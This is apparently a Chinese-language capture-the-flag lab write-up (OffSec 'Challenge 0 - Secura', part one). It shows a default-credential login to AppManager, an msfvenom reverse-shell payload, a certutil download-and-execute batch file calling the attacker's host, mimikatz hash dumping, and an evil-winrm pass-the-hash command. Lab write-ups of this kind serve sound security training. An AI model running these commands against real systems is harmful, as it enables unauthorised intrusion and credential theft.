Challenge 0 - Secura(1)

 Challenge 0 - Secura(1)

Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧

環境說明共三台機器,簡單掃了一下

 - 95 : Web Server 感覺像是進入點

 - 96 : DB 伺服器

 - 97 : DC



95 8443 Port 打開是 AppManager14 版本是 14710

使用預設帳號密碼 admin:admin 可以直接登入



跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功



5001 /


參考 Pentest Everything : https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus

自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe



接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ]



設定執行的檔案為 cmd.bat




建立一個 cmd.bat,內容如下

certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe



上傳 cmd.bat



執行該 Script,成功拿到 Rever Shell



whoami 看一下,進來就是 nt authority\system 直接拿 flag



跑一下 mimikatz.exe

administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14



測試看看 evil-winrm 沒有問題

└─$ evil-winrm -i 192.168.204.95  -u administrator -H "a51493b0b06e5e35f855245e71af1d14"



更新一下靶機資訊



更新帳號密碼表




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

濫用 Windows 庫文件(Library File)